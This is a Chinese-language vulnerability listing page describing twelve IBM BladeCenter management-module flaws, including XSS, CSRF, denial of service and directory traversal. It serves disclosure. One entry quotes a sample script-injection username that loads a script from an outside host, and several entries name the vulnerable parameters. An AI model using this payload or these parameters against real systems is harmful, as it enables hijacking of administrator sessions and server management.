IBM BladeCenter 漏洞列表
共找到 12 个与 IBM BladeCenter 相关的漏洞
📅 加载漏洞趋势中...
-
IBM BladeCenter 跨站脚本漏洞 无POC
IBM BladeCenter是美国IBM公司的一款刀片式服务器。该服务器是指在标准高度的机架式机箱内可插装多个卡式的服务器单元,是一种实现HAHD(High Availability High Density,高可用高密度)的低成本服务器平台,为特殊应用行业和高密度计算环境专门设计。 IBM BladeCenter存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。 -
IBM BladeCenter 跨站脚本漏洞 无POC
IBM BladeCenter是美国IBM公司的一款刀片式服务器。该服务器是指在标准高度的机架式机箱内可插装多个卡式的服务器单元,是一种实现HAHD(High Availability High Density,高可用高密度)的低成本服务器平台,为特殊应用行业和高密度计算环境专门设计。 IBM BladeCenter中存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。 -
IBM BladeCenter Systems Advanced Management Module 跨站脚本漏洞 无POC
IBM BladeCenter Systems是美国IBM公司的一套高性能刀片服务器系统。IBM BladeCenter Advanced Management Module(AMM)是其中的一个用于实现BladeCenter系统级刀片服务器管理的高级管理模块。 IBM BladeCenter Systems中的AMM BPET版本存在跨站脚本漏洞,该漏洞源于程序没有正确的验证用户提交的输入。远程攻击者可利用该漏洞向Web页面中注入恶意的脚本,窃取基于cookie的身份验证证书。 -
IBM BladeCenter SAS Connectivity Module和SAS RAID Module 拒绝服务漏洞 无POC
IBM BladeCenter SAS Connectivity Module(NSSM)和SAS RAID Module(RSSM)都是美国IBM公司的用于BladeCenter系统级刀片服务器中的模块。NSSM是SAS普通连接模块;RSSM是SAS RAID控制交换模块。 IBM BladeCenter NSSM和RSSM 1.3.3.004及之前版本中存在安全漏洞。远程攻击者可通过发送大量的IP数据包利用该漏洞造成拒绝服务(重启)。 -
IBM BladeCenter Advanced Management Module/IBM Integrated Management Module/IBM Integrated Management Module 加密问题漏洞 无POC
IBM BladeCenter Advanced Management Module(AMM)、IBM Integrated Management Module(IMM)和IBM Integrated Management Module II(IMM2)都是美国IBM公司的用于服务器中的集成管理模块。该模块主要用于远程管理服务器。 使用3.65及之前版本固件的IBM BladeCenter AMM、使用1.36 及之前版本固件的IBM IMM、使用3.65及之前版本固件的IBM IMM2中存在安全漏洞,该漏洞源于程序存储明文IPMI证书。攻击者可利用该漏洞执行任意IPMI命令,建立blade远程控制会话。 -
IBM BladeCenter 固件BPET48L权限许可和访问控制漏洞 无POC
具有高级管理模块(AMM)固件BPET48L,可能还有4.7之前版本以及5.0版本的IBM BladeCenter 在web根目录下存储着敏感信息而没有经过充分的访问控制限制,远程攻击者可以通过直接请求下载(1)日志或者(2)核心文件。 -
IBM BladeCenter 固件BPET48L目录遍历漏洞 无POC
具有高级管理模块(AMM)固件BPET48L,可能还有4.7之前版本以及5.0版本的IBM BladeCenter存在目录遍历攻击漏洞。远程认证用户可以借助DIR参数中..(点点)列出任意目录以及可能导致其他未明影响。 -
IBM BladeCenter 固件BPET48L多个跨站脚本攻击漏洞 无POC
具有高级管理模块(AMM)固件BPET48L,可能还有4.7之前版本以及5.0版本的IBM BladeCenter存在多个跨站脚本攻击漏洞(XSS)。远程攻击者可以借助(1)INDEX或者(2)private/cindefn.php中IPADDR参数,(3)private/power_management_policy_options.php中domain参数,(4)private/pm_temp.php或者(5)private/power_module.php中的slot参数,(6)private/blade_leds.php中WEBINDEX参数,或者(7)private/ipmi_bladestatus.php中SLOT参数注入任意的web脚本或者HTML。 -
IBM BladeCenter管理模块远程拒绝服务漏洞 无POC
BladeCenter管理模块是可热插拔到BladeCenter机箱管理槽的硬件设备。 IBM BladeCenter的高级管理模块(AMM)存在远程拒绝服务漏洞,无法正确阻断USB和iSCSI共享,远程攻击者可通过畸形应用数据TCP包引发拒绝服务(管理模块重启)。 -
IBM BladeCenter web管理界面多个跨站脚本和跨站请求伪造漏洞 无POC
IBM BladeCenter是美国IBM公司的系列高性能刀片服务器。 BladeCenter所使用的高级管理模块(AMM)的Web管理接口没有正确地过滤用户所提交的输入和请求。AMM的文件管理器未经任何过滤便在页面显示用户所提交的输入,如果通过认证的管理员访问了恶意URL的话就可能导致另一个跨站脚本攻击。 -
IBM BladeCenter高级管理模块 多个跨站脚本和跨站请求伪造漏洞 无POC
IBM BladeCenter是美国IBM公司的系列高性能刀片服务器。 BladeCenter所使用的高级管理模块(AMM)的Web管理接口没有正确地过滤用户所提交的输入和请求。如果用户使用恶意的凭据试图登录的话,AMM会在事件日志页面记录用户所提交的凭据,之后管理员查看事件日志时就会执行所注入的内容。例如,攻击者可以使用以下用户名登录导致注入: JavaScript:>/script< >script src="//l7.fi"< >/script< >script< -
IBM BladeCenter高级管理模块 'private/login.ssi' 权限许可和访问控制漏洞 无POC
IBM BladeCenter是美国IBM公司的系列高性能刀片服务器。 BladeCenter所使用的高级管理模块(AMM)的Web管理接口没有正确地过滤用户所提交的输入和请求。AMM没有验证HTTP请求的来源,如果通过认证的管理员受骗查看了恶意的HTML内容的话,向AMM的Web管理接口提交恶意表单就可以完全获得管理员权限。由于管理界面允许No session timeout选项,如果没有从浏览器清除缓存的认证凭据的话,即使已经关闭了包含有管理界面的标签页,用户仍可能受这种攻击的影响。